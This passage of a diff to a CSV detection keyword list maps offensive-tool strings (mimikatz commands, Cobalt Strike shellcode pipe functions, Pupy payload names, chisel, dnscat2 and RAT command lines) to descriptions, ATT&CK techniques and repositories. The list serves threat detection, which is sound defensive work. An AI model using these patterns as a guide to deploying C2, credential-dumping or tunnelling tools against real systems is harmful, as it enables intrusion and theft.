Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z"
 "*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless 
lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
 "*Send-CalendarNTLMLeak *","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z"
 "*sendmail -osendmail chmod +x sendmail*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - 
TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
-"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*sensepost/goDoH*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
 "*sensepost/reGeorg*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
-"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
 "*sensepost/wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
-"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*senzee1984/micr0_shell*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
 "*seriously_nothing_shady_here*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
 "*server.py generate --address * --port * --output * --source*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z"
 "*server/modules/csharp/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - 
T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
 "*server@egress-asses.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*server=*port=53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
-"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
-"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*server-console.exe +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
 "*server-console.py --mifi-ip *","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
 "*--server-port * --server-ip * --proxy-ip * --proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" 
@@ -16366,16 +16549,16 @@
 "*Server-Side-Request-Forgery-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
 "*service/executable/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z"
 "*service/executable/compile.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z"
-"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
